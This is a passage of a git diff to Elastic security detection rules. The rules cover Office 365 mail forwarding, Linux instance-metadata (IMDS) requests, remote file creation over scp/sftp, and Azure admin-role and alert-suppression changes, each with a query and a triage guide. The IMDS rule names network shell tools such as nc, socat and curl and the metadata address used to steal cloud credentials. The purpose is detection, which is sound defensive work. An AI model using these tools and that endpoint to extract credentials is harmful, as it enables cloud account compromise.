to identify potential compromise.\n- Consider disabling the forwarding rule temporarily and notifying the user and IT security team if the rule appears suspicious or unauthorized.\n\n### False positive analysis\n\n- Legitimate forwarding rules set by users for convenience or workflow purposes may trigger alerts. Review the context of the rule creation, such as the user and the destination address, to determine if it aligns with normal business operations.\n- Automated systems or third-party applications that integrate with Microsoft 365 might create forwarding rules as part of their functionality. Identify these systems and consider excluding their associated accounts from the rule.\n- Temporary forwarding rules set during user absence, such as vacations or leaves, can be mistaken for malicious activity. Implement a process to document and approve such rules, allowing for their exclusion from monitoring during the specified period.\n- Internal forwarding to trusted domains or addresses within the organization might not pose a security risk. 
Establish a list of trusted internal addresses and configure exceptions for these in the detection rule.\n- Frequent rule changes by specific users, such as IT administrators or support staff, may be part of their job responsibilities. Monitor these accounts separately and adjust the rule to reduce noise from expected behavior.\n\n### Response and remediation\n\n- Immediately disable the forwarding rule by accessing the affected user's mailbox settings in Microsoft 365 and removing any unauthorized forwarding rules.\n- Conduct a thorough review of the affected user's email account for any signs of compromise, such as unusual login activity or unauthorized changes to account settings.\n- Reset the password for the affected user's account and enforce multi-factor authentication (MFA) to prevent further unauthorized access.\n- Notify the user and relevant IT security personnel about the incident, providing details of the unauthorized rule and any potential data exposure.\n- Escalate the incident to the security operations team for further investigation and to determine if other accounts may have been targeted or compromised.\n- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further suspicious activity or rule changes.\n- Review and update email security policies and configurations to prevent similar incidents, ensuring that forwarding rules are monitored and restricted as necessary.", - "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:(\"New-InboxRule\" or \"Set-InboxRule\") and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", - "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", - "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.ForwardAsAttachmentTo", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.ForwardTo", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.RedirectTo", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Collection", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": 
"Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1114", - "name": "Email Collection", - "reference": "https://attack.mitre.org/techniques/T1114/", - "subtechnique": [ - { - "id": "T1114.003", - "name": "Email Forwarding Rule", - "reference": "https://attack.mitre.org/techniques/T1114/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ecc0cd54-608e-11ef-ab6d-f661ea17fbce_4.json b/packages/security_detection_engine/kibana/security_rule/ecc0cd54-608e-11ef-ab6d-f661ea17fbce_4.json deleted file mode 100644 index 95f6da9660c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ecc0cd54-608e-11ef-ab6d-f661ea17fbce_4.json +++ /dev/null @@ -1,139 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if role's are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.network*", - "logs-endpoint.events.process*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Unusual Instance Metadata Service (IMDS) API Request", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Instance Metadata Service (IMDS) API Request\n\nThe Instance Metadata Service (IMDS) API provides essential instance-specific data, including configuration details and temporary credentials, to applications running on cloud instances. Adversaries exploit this by using scripts or tools to access sensitive data, potentially leading to unauthorized access. 
The detection rule identifies suspicious access attempts by monitoring specific processes and network activities, excluding known legitimate paths, to flag potential misuse.\n\n### Possible investigation steps\n\n- Review the process details such as process.name and process.command_line to identify the tool or script used to access the IMDS API and determine if it aligns with known malicious behavior.\n- Examine the process.executable and process.working_directory fields to verify if the execution path is unusual or suspicious, especially if it originates from directories like /tmp/* or /var/tmp/*.\n- Check the process.parent.entity_id and process.parent.executable to understand the parent process and its legitimacy, which might provide context on how the suspicious process was initiated.\n- Investigate the network event details, particularly the destination.ip field, to confirm if there was an attempted connection to the IMDS API endpoint at 169.254.169.254.\n- Correlate the host.id with other security events or logs to identify any additional suspicious activities or patterns on the same host that might indicate a broader compromise.\n- Assess the risk score and severity to prioritize the investigation and determine if immediate action is required to mitigate potential threats.\n\n### False positive analysis\n\n- Security and monitoring tools like Rapid7, Nessus, and Amazon SSM Agent may trigger false positives due to their legitimate access to the IMDS API. Users can exclude these by adding their working directories to the exception list.\n- Automated scripts or processes running from known directories such as /opt/rumble/bin or /usr/share/ec2-instance-connect may also cause false positives. Exclude these directories or specific executables from the rule to prevent unnecessary alerts.\n- System maintenance or configuration scripts that access the IMDS API for legitimate purposes might be flagged. 
Identify these scripts and add their paths or parent executables to the exclusion list to reduce noise.\n- Regular network monitoring tools that attempt connections to the IMDS IP address for health checks or status updates can be excluded by specifying their process names or executable paths in the exception criteria.\n\n### Response and remediation\n\n- Immediately isolate the affected instance from the network to prevent further unauthorized access or data exfiltration.\n- Terminate any suspicious processes identified in the alert that are attempting to access the IMDS API, especially those using tools like curl, wget, or python.\n- Revoke any temporary credentials that may have been exposed or accessed through the IMDS API to prevent unauthorized use.\n- Conduct a thorough review of the instance's security groups and IAM roles to ensure that only necessary permissions are granted and that there are no overly permissive policies.\n- Escalate the incident to the security operations team for further investigation and to determine if additional instances or resources are affected.\n- Implement network monitoring to detect and alert on any future attempts to access the IMDS API from unauthorized processes or locations.\n- Review and update the instance's security configurations and apply any necessary patches or updates to mitigate vulnerabilities that could be exploited in similar attacks.", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.parent.executable != null and \n (\n process.name : (\n \"curl\", \"wget\", \"python*\", \"perl*\", \"php*\", \"ruby*\", \"lua*\", \"telnet\", \"pwsh\",\n \"openssl\", \"nc\", \"ncat\", \"netcat\", \"awk\", \"gawk\", \"mawk\", \"nawk\", \"socat\", \"node\"\n ) or \n process.executable : (\n \"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/var/www/*\", \"/dev/shm/*\", \"/etc/init.d/*\", \"/etc/rc*.d/*\",\n \"/etc/cron*\", \"/etc/update-motd.d/*\", \"/boot/*\", \"/srv/*\", \"/run/*\", \"/etc/rc.local\"\n ) or\n process.command_line: \"*169.254.169.254*\" \n ) \n and not process.working_directory: (\n \"/opt/rapid7*\",\n \"/opt/nessus*\",\n \"/snap/amazon-ssm-agent*\",\n \"/var/snap/amazon-ssm-agent/*\",\n \"/var/log/amazon/ssm/*\",\n \"/srv/snp/docker/overlay2*\",\n \"/opt/nessus_agent/var/nessus/*\") \n and not process.executable: (\n \"/opt/rumble/bin/rumble-agent*\",\n \"/opt/aws/inspector/bin/inspectorssmplugin\",\n \"/snap/oracle-cloud-agent/*\",\n \"/lusr/libexec/oracle-cloud-agent/*\") \n and not process.parent.executable: (\n \"/usr/bin/setup-policy-routes\",\n \"/usr/share/ec2-instance-connect/*\",\n \"/var/lib/amazon/ssm/*\", \n \"/etc/update-motd.d/30-banner\", \n \"/usr/sbin/dhclient-script\", \n \"/usr/local/bin/uwsgi\", \n \"/usr/lib/skylight/al-extras\")\n]\n[network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and destination.ip == \"169.254.169.254\"]\n", - "references": [ - "https://hackingthe.cloud/aws/general-knowledge/intro_metadata_service/" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": 
"keyword" - }, - { - "ecs": true, - "name": "process.command_line", - "type": "wildcard" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.entity_id", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.working_directory", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ecc0cd54-608e-11ef-ab6d-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1552", - "name": "Unsecured Credentials", - "reference": "https://attack.mitre.org/techniques/T1552/", - "subtechnique": [ - { - "id": "T1552.005", - "name": "Cloud Instance Metadata API", - "reference": "https://attack.mitre.org/techniques/T1552/005/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1580", - "name": "Cloud Infrastructure Discovery", - "reference": "https://attack.mitre.org/techniques/T1580/" - } - ] - } - ], - "type": "eql", - "version": 4 - }, - "id": "ecc0cd54-608e-11ef-ab6d-f661ea17fbce_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_1.json b/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_1.json deleted file mode 100644 index c0002fb9884..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_1.json +++ /dev/null @@ -1,100 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. 
This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "logs-endpoint.events.file*", - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Unusual Remote File Creation", - "new_terms_fields": [ - "process.executable", - "host.id" - ], - "query": "event.category:file and host.os.type:linux and event.action:creation and\nprocess.name:(scp or ftp or sftp or vsftpd or sftp-server or sync) and\nnot file.path:(/dev/ptmx or /run/* or /var/run/*)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ed3fedc3-dd10-45a5-a485-34a8b48cea46", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. 
For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.004", - "name": "SSH", - "reference": "https://attack.mitre.org/techniques/T1021/004/" - } - ] - }, - { - "id": "T1570", - "name": "Lateral Tool Transfer", - "reference": "https://attack.mitre.org/techniques/T1570/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "ed3fedc3-dd10-45a5-a485-34a8b48cea46_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_103.json b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_103.json deleted file mode 100644 index 3b42729fab0..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_103.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization.", - "false_positives": [ - "Global administrator additions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Global administrator additions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Global Administrator Role Addition to PIM User", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Global Administrator Role Addition to PIM User\n\nAzure AD's Global Administrator role grants extensive access, allowing users to modify any administrative setting. Privileged Identity Management (PIM) helps manage and monitor such access. Adversaries may exploit this by adding themselves or others to this role, gaining persistent control. The detection rule identifies suspicious role additions by monitoring specific audit logs, focusing on successful role assignments to PIM users, thus helping to flag potential unauthorized access attempts.\n\n### Possible investigation steps\n\n- Review the Azure audit logs to confirm the details of the role addition event, focusing on the event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement fields.\n- Identify the user account that was added to the Global Administrator role by examining the azure.auditlogs.properties.target_resources.*.display_name field.\n- Check the event.outcome field to ensure the role addition was successful and not a failed attempt.\n- Investigate the user account's recent activities and login history to determine if there are any anomalies or signs of compromise.\n- Verify if the role addition aligns with any recent administrative changes or requests within the organization to rule out legitimate actions.\n- Assess the potential impact of the role addition by reviewing the permissions and access levels granted to the user.\n- If suspicious activity is confirmed, initiate a response plan to remove unauthorized access and secure the affected accounts.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role for maintenance or updates. To manage this, create exceptions for known IT personnel or scheduled maintenance windows.\n- Automated scripts or tools used for role assignments can cause false positives if they frequently add users to the Global Administrator role. Consider excluding these automated processes from monitoring or adjusting the detection rule to account for their activity.\n- Temporary project-based role assignments might be flagged as suspicious. Implement a process to document and pre-approve such assignments, allowing for their exclusion from alerts.\n- Training or onboarding sessions where new administrators are temporarily granted elevated access can result in false positives. 
Establish a protocol to notify the monitoring team of these events in advance, so they can be excluded from the detection rule.\n\n### Response and remediation\n\n- Immediately revoke the Global Administrator role from any unauthorized PIM user identified in the alert to prevent further unauthorized access.\n- Conduct a thorough review of recent changes made by the affected account to identify any unauthorized modifications or suspicious activities.\n- Reset the credentials of the compromised account and enforce multi-factor authentication (MFA) to secure the account against further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional monitoring on the affected account and related systems to detect any further suspicious activities.\n- Review and update access policies and role assignments in Azure AD to ensure that only necessary personnel have elevated privileges.\n- Document the incident and response actions taken for future reference and to improve incident response procedures.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and\n azure.auditlogs.operation_name:(\"Add eligible member to role in PIM completed (permanent)\" or\n \"Add member to role in PIM completed (timebound)\") and\n azure.auditlogs.properties.target_resources.*.display_name:\"Global Administrator\" and\n event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.category", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.display_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_103.json b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_103.json deleted file mode 100644 index f1917839042..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_103.json +++ /dev/null @@ -1,82 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - 
"description": "Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility.", - "false_positives": [ - "Suppression Rules can be created legitimately by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Suppression Rules created by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Alert Suppression Rule Created or Modified", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Alert Suppression Rule Created or Modified\n\nAzure Alert Suppression Rules are used to manage alert noise by filtering out known false positives. However, adversaries can exploit these rules to hide malicious activities by suppressing legitimate security alerts. The detection rule monitors Azure activity logs for successful operations related to suppression rule changes, helping identify potential misuse that could lead to defense evasion and reduced security visibility.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific suppression rule that was created or modified by filtering logs with the operation name \"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\" and ensuring the event outcome is \"success\".\n- Determine the identity of the user or service principal that performed the operation by examining the associated user or service account details in the activity logs.\n- Investigate the context and justification for the creation or modification of the suppression rule by checking any related change management records or communications.\n- Assess the impact of the suppression rule on security visibility by identifying which alerts are being suppressed and evaluating whether these alerts are critical for detecting potential threats.\n- Cross-reference the suppression rule changes with recent security incidents or alerts to determine if there is any correlation or if the rule could have been used to hide malicious activity.\n- Verify the legitimacy of the suppression rule by consulting with relevant stakeholders, such as security operations or cloud management teams, to confirm if the change was authorized and aligns with security policies.\n\n### False positive analysis\n\n- Routine maintenance activities by IT staff may trigger alerts when legitimate suppression rules are created or modified. To manage this, establish a baseline of expected changes and create exceptions for known maintenance periods or personnel.\n- Automated processes or scripts that regularly update suppression rules for operational efficiency can generate false positives. 
Identify these processes and exclude their activity from alerting by using specific identifiers or tags associated with the automation.\n- Changes made by trusted third-party security services that integrate with Azure might be flagged. Verify the legitimacy of these services and whitelist their operations to prevent unnecessary alerts.\n- Frequent updates to suppression rules due to evolving security policies can lead to false positives. Document these policy changes and adjust the alerting criteria to accommodate expected modifications.\n- Temporary suppression rules created during incident response to manage alert noise can be mistaken for malicious activity. Ensure these rules are documented and time-bound, and exclude them from alerting during the response period.\n\n### Response and remediation\n\n- Immediately review the Azure activity logs to confirm the creation or modification of the suppression rule and identify the user or service account responsible for the change.\n- Temporarily disable the suspicious suppression rule to restore visibility into potential security alerts that may have been suppressed.\n- Conduct a thorough investigation of recent alerts that were suppressed by the rule to determine if any malicious activities were overlooked.\n- If malicious activity is confirmed, initiate incident response procedures to contain and remediate the threat, including isolating affected resources and accounts.\n- Escalate the incident to the security operations team for further analysis and to assess the potential impact on the organization's security posture.\n- Implement additional monitoring and alerting for changes to suppression rules to ensure any future modifications are promptly detected and reviewed.\n- Review and update access controls and permissions for creating or modifying suppression rules to ensure only authorized personnel can make such changes.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\" and\nevent.outcome: \"success\"\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://docs.microsoft.com/en-us/rest/api/securitycenter/alerts-suppression-rules/update" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f0bc081a-2346-4744-a6a4-81514817e888", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "f0bc081a-2346-4744-a6a4-81514817e888_103", - "type": "security-rule" -} \ No newline at 
end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_3.json b/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_3.json index 274f04bbfbf..aead012d2d5 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_3.json @@ -13,6 +13,16 @@ "name": "Microsoft 365 or Entra ID Sign-in from a Suspicious Source", "note": "## Triage and analysis\n\n### Investigating Microsoft 365 or Entra ID Sign-in from a Suspicious Source\n\n#### Possible investigation steps\n\n- Investigate all the alerts associated with the source.ip.\n - Verify the network security alert details associated with this source.ip.\n - Verify all sign-in events associated with this source.ip.\n - Consider the source IP address and geolocation for the involved user account.\n - Consider the device used to sign in. Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment.
Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "from logs-o365.audit-*, logs-azure.signinlogs-*, .alerts-security.*\n// query runs every 1 hour looking for activities occurred during last 8 hours to match on disparate events\n| where @timestamp > now() - 8 hours\n// filter for azure or m365 sign-in and external alerts with source.ip not null\n| where to_ip(source.ip) is not null\n and (event.dataset in (\"o365.audit\", \"azure.signinlogs\") or kibana.alert.rule.name == \"External Alerts\")\n and not cidr_match(\n to_ip(source.ip),\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\", \"198.18.0.0/15\", 